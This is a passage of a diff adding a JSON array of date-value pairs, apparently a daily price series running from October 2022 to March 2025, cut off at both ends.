+ ], + [ + "2022-10-18", + 9.446227073669434 + ], + [ + "2022-10-19", + 9.331609725952148 + ], + [ + "2022-10-20", + 9.174013137817383 + ], + [ + "2022-10-21", + 9.823501586914062 + ], + [ + "2022-10-24", + 10.157797813415527 + ], + [ + "2022-10-25", + 10.76908016204834 + ], + [ + "2022-10-26", + 10.05750846862793 + ], + [ + "2022-10-27", + 9.503533363342285 + ], + [ + "2022-10-28", + 10.363149642944336 + ], + [ + "2022-10-31", + 10.004976272583008 + ], + [ + "2022-11-01", + 9.694558143615723 + ], + [ + "2022-11-02", + 8.691672325134277 + ], + [ + "2022-11-03", + 8.190231323242188 + ], + [ + "2022-11-04", + 8.572282791137695 + ], + [ + "2022-11-07", + 8.84449577331543 + ], + [ + "2022-11-08", + 9.035520553588867 + ], + [ + "2022-11-09", + 8.405135154724121 + ], + [ + "2022-11-10", + 10.243757247924805 + ], + [ + "2022-11-11", + 10.826386451721191 + ], + [ + "2022-11-14", + 10.539849281311035 + ], + [ + "2022-11-15", + 10.96488094329834 + ], + [ + "2022-11-16", + 10.520747184753418 + ], + [ + "2022-11-17", + 10.439559936523438 + ], + [ + "2022-11-18", + 10.430007934570312 + ], + [ + "2022-11-21", + 10.114816665649414 + ], + [ + "2022-11-22", + 10.539849281311035 + ], + [ + "2022-11-23", + 10.855040550231934 + ], + [ + "2022-11-25", + 10.630586624145508 + ], + [ + "2022-11-28", + 10.162571907043457 + ], + [ + "2022-11-29", + 9.919015884399414 + ], + [ + "2022-11-30", + 11.251418113708496 + ], + [ + "2022-12-01", + 11.313501358032227 + ], + [ + "2022-12-02", + 11.17978572845459 + ], + [ + "2022-12-05", + 10.616259574890137 + ], + [ + "2022-12-06", + 9.942893981933594 + ], + [ + "2022-12-07", + 9.823501586914062 + ], + [ + "2022-12-08", + 10.17212200164795 + ], + [ + "2022-12-09", + 9.976323127746582 + ], + [ + "2022-12-12", + 10.339269638061523 + ], + [ + "2022-12-13", + 10.664015769958496 + ], + [ + "2022-12-14", + 10.410906791687012 + ], + [ + "2022-12-15", + 9.379365921020508 + ], + [ + "2022-12-16", + 9.102378845214844 + ], + [ + "2022-12-19", + 8.725102424621582 + ], + [ + "2022-12-20", + 8.686896324157715 + ], + [ + "2022-12-21", + 9.064173698425293 + ], + [ + "2022-12-22", + 8.41995620727539 + ], + [ + "2022-12-23", + 8.443958282470703 + ], + [ + "2022-12-27", + 8.0839262008667 + ], + [ + "2022-12-28", + 7.757496356964111 + ], + [ + "2022-12-29", + 8.304747581481934 + ], + [ + "2022-12-30", + 8.304747581481934 + ], + [ + "2023-01-03", + 8.117528915405273 + ], + [ + "2023-01-04", + 8.242341041564941 + ], + [ + "2023-01-05", + 7.853505611419678 + ], + [ + "2023-01-06", + 8.4679594039917 + ], + [ + "2023-01-09", + 8.645577430725098 + ], + [ + "2023-01-10", + 8.875996589660645 + ], + [ + "2023-01-11", + 9.31763744354248 + ], + [ + "2023-01-12", + 9.461648941040039 + ], + [ + "2023-01-13", + 9.648865699768066 + ], + [ + "2023-01-17", + 9.70167064666748 + ], + [ + "2023-01-18", + 9.34163761138916 + ], + [ + "2023-01-19", + 9.048812866210938 + ], + [ + "2023-01-20", + 9.788078308105469 + ], + [ + "2023-01-23", + 10.43133544921875 + ], + [ + "2023-01-24", + 10.368928909301758 + ], + [ + "2023-01-25", + 10.292123794555664 + ], + [ + "2023-01-26", + 10.887377738952637 + ], + [ + "2023-01-27", + 11.199406623840332 + ], + [ + "2023-01-30", + 10.52734661102295 + ], + [ + "2023-01-31", + 10.997787475585938 + ], + [ + "2023-02-01", + 11.708251953125 + ], + [ + "2023-02-02", + 12.917959213256836 + ], + [ + "2023-02-03", + 12.250699996948242 + ], + [ + "2023-02-06", + 11.938672065734863 + ], + [ + "2023-02-07", + 12.677938461303711 + ], + [ + "2023-02-08", + 11.99627685546875 + ], + [ + "2023-02-09", + 11.67464828491211 + ], + [ + "2023-02-10", + 11.434627532958984 + ], + [ + "2023-02-13", + 11.977076530456543 + ], + [ + "2023-02-14", + 12.236298561096191 + ], + [ + "2023-02-15", + 12.50992202758789 + ], + [ + "2023-02-16", + 11.794658660888672 + ], + [ + "2023-02-17", + 11.54023551940918 + ], + [ + "2023-02-21", + 10.728963851928711 + ], + [ + "2023-02-22", + 10.738565444946289 + ], + [ + "2023-02-23", + 11.0073881149292 + ], + [ + "2023-02-24", + 10.450539588928223 + ], + [ + "2023-02-27", + 10.676158905029297 + ], + [ + "2023-02-28", + 10.623353004455566 + ], + [ + "2023-03-01", + 10.364131927490234 + ], + [ + "2023-03-02", + 10.613752365112305 + ], + [ + "2023-03-03", + 11.261809349060059 + ], + [ + "2023-03-06", + 11.309813499450684 + ], + [ + "2023-03-07", + 10.887377738952637 + ], + [ + "2023-03-08", + 11.036190032958984 + ], + [ + "2023-03-09", + 10.455339431762695 + ], + [ + "2023-03-10", + 10.023299217224121 + ], + [ + "2023-03-13", + 10.239319801330566 + ], + [ + "2023-03-14", + 10.935381889343262 + ], + [ + "2023-03-15", + 11.09379768371582 + ], + [ + "2023-03-16", + 11.972275733947754 + ], + [ + "2023-03-17", + 11.794658660888672 + ], + [ + "2023-03-20", + 11.919469833374023 + ], + [ + "2023-03-21", + 12.423517227172852 + ], + [ + "2023-03-22", + 11.916531562805176 + ], + [ + "2023-03-23", + 12.341431617736816 + ], + [ + "2023-03-24", + 12.466970443725586 + ], + [ + "2023-03-27", + 12.211065292358398 + ], + [ + "2023-03-28", + 12.008272171020508 + ], + [ + "2023-03-29", + 12.664934158325195 + ], + [ + "2023-03-30", + 13.007753372192383 + ], + [ + "2023-03-31", + 13.645106315612793 + ], + [ + "2023-04-03", + 13.548535346984863 + ], + [ + "2023-04-04", + 13.41334056854248 + ], + [ + "2023-04-05", + 12.983613014221191 + ], + [ + "2023-04-06", + 13.244345664978027 + ], + [ + "2023-04-10", + 13.215376853942871 + ], + [ + "2023-04-11", + 12.959468841552734 + ], + [ + "2023-04-12", + 12.616650581359863 + ], + [ + "2023-04-13", + 13.340913772583008 + ], + [ + "2023-04-14", + 13.263659477233887 + ], + [ + "2023-04-17", + 13.278143882751465 + ], + [ + "2023-04-18", + 13.287802696228027 + ], + [ + "2023-04-19", + 13.258831024169922 + ], + [ + "2023-04-20", + 12.949812889099121 + ], + [ + "2023-04-21", + 12.973956108093262 + ], + [ + "2023-04-24", + 12.896699905395508 + ], + [ + "2023-04-25", + 12.167610168457031 + ], + [ + "2023-04-26", + 12.370403289794922 + ], + [ + "2023-04-27", + 13.369884490966797 + ], + [ + "2023-04-28", + 13.640276908874512 + ], + [ + "2023-05-01", + 13.601648330688477 + ], + [ + "2023-05-02", + 13.239517211914062 + ], + [ + "2023-05-03", + 12.97878360748291 + ], + [ + "2023-05-04", + 12.833930969238281 + ], + [ + "2023-05-05", + 13.62096118927002 + ], + [ + "2023-05-08", + 13.732015609741211 + ], + [ + "2023-05-09", + 13.466453552246094 + ], + [ + "2023-05-10", + 13.90101146697998 + ], + [ + "2023-05-11", + 14.016892433166504 + ], + [ + "2023-05-12", + 13.872039794921875 + ], + [ + "2023-05-15", + 14.084492683410645 + ], + [ + "2023-05-16", + 14.137604713439941 + ], + [ + "2023-05-17", + 14.644587516784668 + ], + [ + "2023-05-18", + 15.431618690490723 + ], + [ + "2023-05-19", + 15.325393676757812 + ], + [ + "2023-05-22", + 15.48473072052002 + ], + [ + "2023-05-23", + 14.886007308959961 + ], + [ + "2023-05-24", + 14.644587516784668 + ], + [ + "2023-05-25", + 15.702008247375488 + ], + [ + "2023-05-26", + 16.889799118041992 + ], + [ + "2023-05-30", + 17.126394271850586 + ], + [ + "2023-05-31", + 16.778743743896484 + ], + [ + "2023-06-01", + 17.387123107910156 + ], + [ + "2023-06-02", + 17.778230667114258 + ], + [ + "2023-06-05", + 17.816858291625977 + ], + [ + "2023-06-06", + 17.79754066467285 + ], + [ + "2023-06-07", + 16.889799118041992 + ], + [ + "2023-06-08", + 17.469205856323242 + ], + [ + "2023-06-09", + 17.68166160583496 + ], + [ + "2023-06-12", + 18.58457374572754 + ], + [ + "2023-06-13", + 18.999818801879883 + ], + [ + "2023-06-14", + 19.40540313720703 + ], + [ + "2023-06-15", + 20.086210250854492 + ], + [ + "2023-06-16", + 19.69993782043457 + ], + [ + "2023-06-20", + 19.60336685180664 + ], + [ + "2023-06-21", + 18.81772804260254 + ], + [ + "2023-06-22", + 19.44255828857422 + ], + [ + "2023-06-23", + 18.86616325378418 + ], + [ + "2023-06-26", + 18.120229721069336 + ], + [ + "2023-06-27", + 19.016313552856445 + ], + [ + "2023-06-28", + 19.132564544677734 + ], + [ + "2023-06-29", + 19.001781463623047 + ], + [ + "2023-06-30", + 19.85911750793457 + ], + [ + "2023-07-03", + 19.994739532470703 + ], + [ + "2023-07-05", + 19.980209350585938 + ], + [ + "2023-07-06", + 19.510372161865234 + ], + [ + "2023-07-07", + 19.311779022216797 + ], + [ + "2023-07-10", + 19.326313018798828 + ], + [ + "2023-07-11", + 19.602401733398438 + ], + [ + "2023-07-12", + 20.328954696655273 + ], + [ + "2023-07-13", + 21.341283798217773 + ], + [ + "2023-07-14", + 21.321910858154297 + ], + [ + "2023-07-17", + 21.912839889526367 + ], + [ + "2023-07-18", + 22.435958862304688 + ], + [ + "2023-07-19", + 22.435958862304688 + ], + [ + "2023-07-20", + 20.86176300048828 + ], + [ + "2023-07-21", + 20.67770004272461 + ], + [ + "2023-07-24", + 20.76004409790039 + ], + [ + "2023-07-25", + 21.176599502563477 + ], + [ + "2023-07-26", + 20.958637237548828 + ], + [ + "2023-07-27", + 20.779417037963867 + ], + [ + "2023-07-28", + 21.903156280517578 + ], + [ + "2023-07-31", + 21.946748733520508 + ], + [ + "2023-08-01", + 21.7772159576416 + ], + [ + "2023-08-02", + 20.353174209594727 + ], + [ + "2023-08-03", + 20.207866668701172 + ], + [ + "2023-08-04", + 19.926929473876953 + ], + [ + "2023-08-07", + 20.42098617553711 + ], + [ + "2023-08-08", + 19.897869110107422 + ], + [ + "2023-08-09", + 19.23427963256836 + ], + [ + "2023-08-10", + 19.321468353271484 + ], + [ + "2023-08-11", + 18.933977127075195 + ], + [ + "2023-08-14", + 19.56365394592285 + ], + [ + "2023-08-15", + 18.963035583496094 + ], + [ + "2023-08-16", + 18.333356857299805 + ], + [ + "2023-08-17", + 17.71336555480957 + ], + [ + "2023-08-18", + 17.631019592285156 + ], + [ + "2023-08-21", + 18.483509063720703 + ], + [ + "2023-08-22", + 18.401166915893555 + ], + [ + "2023-08-23", + 19.268186569213867 + ], + [ + "2023-08-24", + 17.999143600463867 + ], + [ + "2023-08-25", + 18.425384521484375 + ], + [ + "2023-08-28", + 18.837099075317383 + ], + [ + "2023-08-29", + 20.038331985473633 + ], + [ + "2023-08-30", + 20.37255096435547 + ], + [ + "2023-08-31", + 20.556608200073242 + ], + [ + "2023-09-01", + 20.48395347595215 + ], + [ + "2023-09-05", + 20.537233352661133 + ], + [ + "2023-09-06", + 19.994739532470703 + ], + [ + "2023-09-07", + 19.558809280395508 + ], + [ + "2023-09-08", + 19.616931915283203 + ], + [ + "2023-09-11", + 20.285364151000977 + ], + [ + "2023-09-12", + 19.636310577392578 + ], + [ + "2023-09-13", + 19.83005142211914 + ], + [ + "2023-09-14", + 20.2950496673584 + ], + [ + "2023-09-15", + 19.2536563873291 + ], + [ + "2023-09-18", + 19.29724884033203 + ], + [ + "2023-09-19", + 19.18100357055664 + ], + [ + "2023-09-20", + 18.349327087402344 + ], + [ + "2023-09-21", + 17.30426597595215 + ], + [ + "2023-09-22", + 17.318849563598633 + ], + [ + "2023-09-25", + 17.547306060791016 + ], + [ + "2023-09-26", + 16.764720916748047 + ], + [ + "2023-09-27", + 16.86680030822754 + ], + [ + "2023-09-28", + 17.275100708007812 + ], + [ + "2023-09-29", + 17.313989639282227 + ], + [ + "2023-10-02", + 17.727153778076172 + ], + [ + "2023-10-03", + 16.78902816772461 + ], + [ + "2023-10-04", + 17.469533920288086 + ], + [ + "2023-10-05", + 17.28482437133789 + ], + [ + "2023-10-06", + 18.15489387512207 + ], + [ + "2023-10-09", + 18.4222412109375 + ], + [ + "2023-10-10", + 18.72360610961914 + ], + [ + "2023-10-11", + 19.12218475341797 + ], + [ + "2023-10-12", + 18.89859390258789 + ], + [ + "2023-10-13", + 18.184059143066406 + ], + [ + "2023-10-16", + 18.796518325805664 + ], + [ + "2023-10-17", + 18.616670608520508 + ], + [ + "2023-10-18", + 17.829225540161133 + ], + [ + "2023-10-19", + 17.352874755859375 + ], + [ + "2023-10-20", + 16.57029151916504 + ], + [ + "2023-10-23", + 16.716114044189453 + ], + [ + "2023-10-24", + 17.18760871887207 + ], + [ + "2023-10-25", + 15.92867374420166 + ], + [ + "2023-10-26", + 15.00027084350586 + ], + [ + "2023-10-27", + 15.214144706726074 + ], + [ + "2023-10-30", + 15.705079078674316 + ], + [ + "2023-10-31", + 15.933534622192383 + ], + [ + "2023-11-01", + 16.755001068115234 + ], + [ + "2023-11-02", + 17.644519805908203 + ], + [ + "2023-11-03", + 18.26669692993164 + ], + [ + "2023-11-06", + 18.475706100463867 + ], + [ + "2023-11-07", + 18.995811462402344 + ], + [ + "2023-11-08", + 19.029834747314453 + ], + [ + "2023-11-09", + 18.577783584594727 + ], + [ + "2023-11-10", + 19.817272186279297 + ], + [ + "2023-11-13", + 19.637426376342773 + ], + [ + "2023-11-14", + 20.87205696105957 + ], + [ + "2023-11-15", + 20.930387496948242 + ], + [ + "2023-11-16", + 20.964406967163086 + ], + [ + "2023-11-17", + 20.978988647460938 + ], + [ + "2023-11-20", + 21.727550506591797 + ], + [ + "2023-11-21", + 21.33382797241211 + ], + [ + "2023-11-22", + 21.581729888916016 + ], + [ + "2023-11-24", + 21.47479248046875 + ], + [ + "2023-11-27", + 21.41160011291504 + ], + [ + "2023-11-28", + 21.581729888916016 + ], + [ + "2023-11-29", + 21.503955841064453 + ], + [ + "2023-11-30", + 21.32411003112793 + ], + [ + "2023-12-01", + 21.503955841064453 + ], + [ + "2023-12-04", + 20.89150047302246 + ], + [ + "2023-12-05", + 21.04218101501465 + ], + [ + "2023-12-06", + 20.66790199279785 + ], + [ + "2023-12-07", + 21.533117294311523 + ], + [ + "2023-12-08", + 21.790739059448242 + ], + [ + "2023-12-11", + 22.344863891601562 + ], + [ + "2023-12-12", + 22.8844051361084 + ], + [ + "2023-12-13", + 23.691293716430664 + ], + [ + "2023-12-14", + 23.652406692504883 + ], + [ + "2023-12-15", + 23.934329986572266 + ], + [ + "2023-12-18", + 24.434986114501953 + ], + [ + "2023-12-19", + 24.799543380737305 + ], + [ + "2023-12-20", + 23.697650909423828 + ], + [ + "2023-12-21", + 24.483675003051758 + ], + [ + "2023-12-22", + 24.581310272216797 + ], + [ + "2023-12-26", + 25.03046226501465 + ], + [ + "2023-12-27", + 25.162281036376953 + ], + [ + "2023-12-28", + 25.098812103271484 + ], + [ + "2023-12-29", + 24.752185821533203 + ], + [ + "2024-01-02", + 23.497488021850586 + ], + [ + "2024-01-03", + 22.745643615722656 + ], + [ + "2024-01-04", + 22.364843368530273 + ], + [ + "2024-01-05", + 22.447839736938477 + ], + [ + "2024-01-08", + 23.8001766204834 + ], + [ + "2024-01-09", + 23.956405639648438 + ], + [ + "2024-01-10", + 24.42996597290039 + ], + [ + "2024-01-11", + 24.547134399414062 + ], + [ + "2024-01-12", + 24.57642936706543 + ], + [ + "2024-01-16", + 24.561784744262695 + ], + [ + "2024-01-17", + 24.137039184570312 + ], + [ + "2024-01-18", + 25.172042846679688 + ], + [ + "2024-01-19", + 26.626907348632812 + ], + [ + "2024-01-22", + 26.734310150146484 + ], + [ + "2024-01-23", + 27.051647186279297 + ], + [ + "2024-01-24", + 27.495914459228516 + ], + [ + "2024-01-25", + 27.574031829833984 + ], + [ + "2024-01-26", + 27.066293716430664 + ], + [ + "2024-01-29", + 27.86207389831543 + ], + [ + "2024-01-30", + 27.305513381958008 + ], + [ + "2024-01-31", + 25.699308395385742 + ], + [ + "2024-02-01", + 26.607376098632812 + ], + [ + "2024-02-02", + 27.945068359375 + ], + [ + "2024-02-05", + 27.803489685058594 + ], + [ + "2024-02-06", + 27.64238166809082 + ], + [ + "2024-02-07", + 28.46745491027832 + ], + [ + "2024-02-08", + 28.584623336791992 + ], + [ + "2024-02-09", + 29.424341201782227 + ], + [ + "2024-02-12", + 29.07771873474121 + ], + [ + "2024-02-13", + 27.700965881347656 + ], + [ + "2024-02-14", + 28.579742431640625 + ], + [ + "2024-02-15", + 28.818965911865234 + ], + [ + "2024-02-16", + 28.028064727783203 + ], + [ + "2024-02-20", + 27.37874984741211 + ], + [ + "2024-02-21", + 27.03700065612793 + ], + [ + "2024-02-22", + 29.375520706176758 + ], + [ + "2024-02-23", + 29.107004165649414 + ], + [ + "2024-02-26", + 29.06795310974121 + ], + [ + "2024-02-27", + 29.248584747314453 + ], + [ + "2024-02-28", + 28.7750244140625 + ], + [ + "2024-02-29", + 29.468284606933594 + ], + [ + "2024-03-01", + 30.820619583129883 + ], + [ + "2024-03-04", + 30.45446014404297 + ], + [ + "2024-03-05", + 28.82384490966797 + ], + [ + "2024-03-06", + 29.355995178222656 + ], + [ + "2024-03-07", + 30.66439437866211 + ], + [ + "2024-03-08", + 29.321821212768555 + ], + [ + "2024-03-11", + 28.980072021484375 + ], + [ + "2024-03-12", + 30.210357666015625 + ], + [ + "2024-03-13", + 29.507339477539062 + ], + [ + "2024-03-14", + 29.268115997314453 + ], + [ + "2024-03-15", + 28.198936462402344 + ], + [ + "2024-03-18", + 28.99471664428711 + ], + [ + "2024-03-19", + 29.19488525390625 + ], + [ + "2024-03-20", + 30.231170654296875 + ], + [ + "2024-03-21", + 30.62314796447754 + ], + [ + "2024-03-22", + 30.68684196472168 + ], + [ + "2024-03-25", + 30.373262405395508 + ], + [ + "2024-03-26", + 30.08907699584961 + ], + [ + "2024-03-27", + 30.35366439819336 + ], + [ + "2024-03-28", + 30.16257667541504 + ], + [ + "2024-04-01", + 30.3487606048584 + ], + [ + "2024-04-02", + 29.535415649414062 + ], + [ + "2024-04-03", + 29.731401443481445 + ], + [ + "2024-04-04", + 28.3300838470459 + ], + [ + "2024-04-05", + 29.329626083374023 + ], + [ + "2024-04-08", + 29.349225997924805 + ], + [ + "2024-04-09", + 29.653005599975586 + ], + [ + "2024-04-10", + 28.87395477294922 + ], + [ + "2024-04-11", + 30.231170654296875 + ], + [ + "2024-04-12", + 28.77105712890625 + ], + [ + "2024-04-15", + 27.325645446777344 + ], + [ + "2024-04-16", + 27.330547332763672 + ], + [ + "2024-04-17", + 26.31630516052246 + ], + [ + "2024-04-18", + 25.845937728881836 + ], + [ + "2024-04-19", + 24.24373435974121 + ], + [ + "2024-04-22", + 24.949289321899414 + ], + [ + "2024-04-23", + 26.061521530151367 + ], + [ + "2024-04-24", + 26.31630516052246 + ], + [ + "2024-04-25", + 25.894935607910156 + ], + [ + "2024-04-26", + 27.085559844970703 + ], + [ + "2024-04-29", + 27.4089412689209 + ], + [ + "2024-04-30", + 25.84103775024414 + ], + [ + "2024-05-01", + 25.282466888427734 + ], + [ + "2024-05-02", + 26.218311309814453 + ], + [ + "2024-05-03", + 27.781322479248047 + ], + [ + "2024-05-06", + 28.692665100097656 + ], + [ + "2024-05-07", + 28.692665100097656 + ], + [ + "2024-05-08", + 28.63876724243164 + ], + [ + "2024-05-09", + 28.79555892944336 + ], + [ + "2024-05-10", + 28.991546630859375 + ], + [ + "2024-05-13", + 29.18263816833496 + ], + [ + "2024-05-14", + 29.726499557495117 + ], + [ + "2024-05-15", + 31.098419189453125 + ], + [ + "2024-05-16", + 30.907329559326172 + ], + [ + "2024-05-17", + 30.83873176574707 + ], + [ + "2024-05-20", + 31.475692749023438 + ], + [ + "2024-05-21", + 31.63738441467285 + ], + [ + "2024-05-22", + 31.617786407470703 + ], + [ + "2024-05-23", + 31.147415161132812 + ], + [ + "2024-05-24", + 32.01956558227539 + ], + [ + "2024-05-28", + 32.3674430847168 + ], + [ + "2024-05-29", + 31.691282272338867 + ], + [ + "2024-05-30", + 30.672143936157227 + ], + [ + "2024-05-31", + 30.637845993041992 + ], + [ + "2024-06-03", + 30.93672752380371 + ], + [ + "2024-06-04", + 31.16701316833496 + ], + [ + "2024-06-05", + 33.04849624633789 + ], + [ + "2024-06-06", + 33.009307861328125 + ], + [ + "2024-06-07", + 32.88681411743164 + ], + [ + "2024-06-10", + 33.23468780517578 + ], + [ + "2024-06-11", + 33.920650482177734 + ], + [ + "2024-06-12", + 35.258262634277344 + ], + [ + "2024-06-13", + 35.82173538208008 + ], + [ + "2024-06-14", + 36.34109878540039 + ], + [ + "2024-06-17", + 37.65912628173828 + ], + [ + "2024-06-18", + 37.6787223815918 + ], + [ + "2024-06-20", + 36.7918701171875 + ], + [ + "2024-06-21", + 36.45379638671875 + ], + [ + "2024-06-24", + 35.21907043457031 + ], + [ + "2024-06-25", + 36.394996643066406 + ], + [ + "2024-06-26", + 36.622718811035156 + ], + [ + "2024-06-27", + 36.88832092285156 + ], + [ + "2024-06-28", + 36.30793762207031 + ], + [ + "2024-07-01", + 36.90306854248047 + ], + [ + "2024-07-02", + 38.03431701660156 + ], + [ + "2024-07-03", + 38.96882247924805 + ], + [ + "2024-07-05", + 40.14925003051758 + ], + [ + "2024-07-08", + 40.41484451293945 + ], + [ + "2024-07-09", + 40.50337219238281 + ], + [ + "2024-07-10", + 41.772335052490234 + ], + [ + "2024-07-11", + 39.02783966064453 + ], + [ + "2024-07-12", + 39.66231918334961 + ], + [ + "2024-07-15", + 39.957427978515625 + ], + [ + "2024-07-16", + 39.986934661865234 + ], + [ + "2024-07-17", + 36.470252990722656 + ], + [ + "2024-07-18", + 35.9243049621582 + ], + [ + "2024-07-19", + 34.9504508972168 + ], + [ + "2024-07-22", + 36.47517395019531 + ], + [ + "2024-07-23", + 36.081695556640625 + ], + [ + "2024-07-24", + 32.191200256347656 + ], + [ + "2024-07-25", + 31.118986129760742 + ], + [ + "2024-07-26", + 32.00922393798828 + ], + [ + "2024-07-29", + 32.19612503051758 + ], + [ + "2024-07-30", + 30.882902145385742 + ], + [ + "2024-07-31", + 33.58312225341797 + ], + [ + "2024-08-01", + 31.163251876831055 + ], + [ + "2024-08-02", + 28.890932083129883 + ], + [ + "2024-08-05", + 26.37268829345703 + ], + [ + "2024-08-06", + 27.031757354736328 + ], + [ + "2024-08-07", + 26.16119384765625 + ], + [ + "2024-08-08", + 28.556476593017578 + ], + [ + "2024-08-09", + 28.94503402709961 + ], + [ + "2024-08-12", + 29.141773223876953 + ], + [ + "2024-08-13", + 31.261621475219727 + ], + [ + "2024-08-14", + 31.31572151184082 + ], + [ + "2024-08-15", + 33.67165756225586 + ], + [ + "2024-08-16", + 33.76019287109375 + ], + [ + "2024-08-19", + 35.06850051879883 + ], + [ + "2024-08-20", + 34.85208511352539 + ], + [ + "2024-08-21", + 35.32917404174805 + ], + [ + "2024-08-22", + 33.63230895996094 + ], + [ + "2024-08-23", + 34.68976974487305 + ], + [ + "2024-08-26", + 33.67165756225586 + ], + [ + "2024-08-27", + 33.9569206237793 + ], + [ + "2024-08-28", + 32.806007385253906 + ], + [ + "2024-08-29", + 32.63386535644531 + ], + [ + "2024-08-30", + 33.74542999267578 + ], + [ + "2024-09-03", + 30.666488647460938 + ], + [ + "2024-09-04", + 30.405813217163086 + ], + [ + "2024-09-05", + 30.504180908203125 + ], + [ + "2024-09-06", + 28.030202865600586 + ], + [ + "2024-09-09", + 29.072914123535156 + ], + [ + "2024-09-10", + 29.85494613647461 + ], + [ + "2024-09-11", + 31.75838279724121 + ], + [ + "2024-09-12", + 32.69780731201172 + ], + [ + "2024-09-13", + 33.125709533691406 + ], + [ + "2024-09-16", + 32.683048248291016 + ], + [ + "2024-09-17", + 32.702720642089844 + ], + [ + "2024-09-18", + 32.27482223510742 + ], + [ + "2024-09-19", + 34.71437072753906 + ], + [ + "2024-09-20", + 34.493038177490234 + ], + [ + "2024-09-23", + 34.748802185058594 + ], + [ + "2024-09-24", + 35.24064254760742 + ], + [ + "2024-09-25", + 35.36399841308594 + ], + [ + "2024-09-26", + 36.114013671875 + ], + [ + "2024-09-27", + 35.49229049682617 + ], + [ + "2024-09-30", + 35.76860427856445 + ], + [ + "2024-10-01", + 34.2537841796875 + ], + [ + "2024-10-02", + 34.382080078125 + ], + [ + "2024-10-03", + 34.30312728881836 + ], + [ + "2024-10-04", + 35.51202392578125 + ], + [ + "2024-10-07", + 34.34260177612305 + ], + [ + "2024-10-08", + 35.8327522277832 + ], + [ + "2024-10-09", + 36.696258544921875 + ], + [ + "2024-10-10", + 36.56796646118164 + ], + [ + "2024-10-11", + 36.66171646118164 + ], + [ + "2024-10-14", + 37.59922790527344 + ], + [ + "2024-10-15", + 36.099205017089844 + ], + [ + "2024-10-16", + 36.07947540283203 + ], + [ + "2024-10-17", + 36.188018798828125 + ], + [ + "2024-10-18", + 36.8294792175293 + ], + [ + "2024-10-21", + 37.03178405761719 + ], + [ + "2024-10-22", + 37.14033508300781 + ], + [ + "2024-10-23", + 35.42321014404297 + ], + [ + "2024-10-24", + 36.266971588134766 + ], + [ + "2024-10-25", + 36.878822326660156 + ], + [ + "2024-10-28", + 36.913360595703125 + ], + [ + "2024-10-29", + 37.934757232666016 + ], + [ + "2024-10-30", + 37.090999603271484 + ], + [ + "2024-10-31", + 34.268585205078125 + ], + [ + "2024-11-01", + 34.99885940551758 + ], + [ + "2024-11-04", + 34.67320251464844 + ], + [ + "2024-11-05", + 35.99065399169922 + ], + [ + "2024-11-06", + 38.911746978759766 + ], + [ + "2024-11-07", + 40.73249816894531 + ], + [ + "2024-11-08", + 40.831180572509766 + ], + [ + "2024-11-11", + 40.757164001464844 + ], + [ + "2024-11-12", + 40.53512954711914 + ], + [ + "2024-11-13", + 40.35749053955078 + ], + [ + "2024-11-14", + 39.50386047363281 + ], + [ + "2024-11-15", + 36.646907806396484 + ], + [ + "2024-11-18", + 37.387054443359375 + ], + [ + "2024-11-19", + 38.137062072753906 + ], + [ + "2024-11-20", + 38.092655181884766 + ], + [ + "2024-11-21", + 38.4676628112793 + ], + [ + "2024-11-22", + 38.61075210571289 + ], + [ + "2024-11-25", + 38.78839111328125 + ], + [ + "2024-11-26", + 39.39037322998047 + ], + [ + "2024-11-27", + 38.438053131103516 + ], + [ + "2024-11-29", + 39.41997146606445 + ], + [ + "2024-12-02", + 40.697959899902344 + ], + [ + "2024-12-03", + 41.058162689208984 + ], + [ + "2024-12-04", + 42.55818176269531 + ], + [ + "2024-12-05", + 42.20785140991211 + ], + [ + "2024-12-06", + 43.293392181396484 + ], + [ + "2024-12-09", + 42.281864166259766 + ], + [ + "2024-12-10", + 41.822975158691406 + ], + [ + "2024-12-11", + 44.05820083618164 + ], + [ + "2024-12-12", + 43.18483352661133 + ], + [ + "2024-12-13", + 44.112483978271484 + ], + [ + "2024-12-16", + 46.03191375732422 + ], + [ + "2024-12-17", + 45.415130615234375 + ], + [ + "2024-12-18", + 40.50551986694336 + ], + [ + "2024-12-19", + 39.933143615722656 + ], + [ + "2024-12-20", + 40.96934127807617 + ], + [ + "2024-12-23", + 42.110469818115234 + ], + [ + "2024-12-24", + 43.7838020324707 + ], + [ + "2024-12-26", + 43.689735412597656 + ], + [ + "2024-12-27", + 41.91244888305664 + ], + [ + "2024-12-30", + 40.229217529296875 + ], + [ + "2024-12-31", + 39.174720764160156 + ], + [ + "2025-01-02", + 38.927188873291016 + ], + [ + "2025-01-03", + 40.7935905456543 + ], + [ + "2025-01-06", + 42.18473434448242 + ], + [ + "2025-01-07", + 39.912376403808594 + ], + [ + "2025-01-08", + 39.94207763671875 + ], + [ + "2025-01-10", + 38.036067962646484 + ], + [ + "2025-01-13", + 37.640010833740234 + ], + [ + "2025-01-14", + 37.506343841552734 + ], + [ + "2025-01-15", + 40.04108810424805 + ], + [ + "2025-01-16", + 39.22422790527344 + ], + [ + "2025-01-17", + 41.159934997558594 + ], + [ + "2025-01-21", + 41.843135833740234 + ], + [ + "2025-01-22", + 43.46696472167969 + ], + [ + "2025-01-23", + 43.73429489135742 + ], + [ + "2025-01-24", + 42.9471435546875 + ], + [ + "2025-01-27", + 39.17967224121094 + ], + [ + "2025-01-28", + 40.917362213134766 + ], + [ + "2025-01-29", + 40.66487121582031 + ], + [ + "2025-01-30", + 41.1747932434082 + ], + [ + "2025-01-31", + 40.9520149230957 + ], + [ + "2025-02-03", + 39.96187973022461 + ], + [ + "2025-02-04", + 41.41242980957031 + ], + [ + "2025-02-05", + 41.952056884765625 + ], + [ + "2025-02-06", + 42.580787658691406 + ], + [ + "2025-02-07", + 40.956966400146484 + ], + [ + "2025-02-10", + 42.397613525390625 + ], + [ + "2025-02-11", + 42.09562301635742 + ], + [ + "2025-02-12", + 42.179779052734375 + ], + [ + "2025-02-13", + 43.95707702636719 + ], + [ + "2025-02-14", + 44.47195053100586 + ], + [ + "2025-02-18", + 44.749183654785156 + ], + [ + "2025-02-19", + 44.7541389465332 + ], + [ + "2025-02-20", + 44.20956039428711 + ], + [ + "2025-02-21", + 41.442134857177734 + ], + [ + "2025-02-24", + 39.95197677612305 + ], + [ + "2025-02-25", + 38.42716979980469 + ], + [ + "2025-02-26", + 38.674705505371094 + ], + [ + "2025-02-27", + 35.46665954589844 + ], + [ + "2025-02-28", + 37.090484619140625 + ], + [ + "2025-03-03", + 34.694358825683594 + ], + [ + "2025-03-04", + 34.313148498535156 + ], + [ + "2025-03-05", + 35.649837493896484 + ], + [ + "2025-03-06", + 32.694278717041016 + ], + [ + "2025-03-07", + 33.372528076171875 + ], + [ + "2025-03-10", + 29.610010147094727 + ], + [ + "2025-03-11", + 29.26346206665039 + 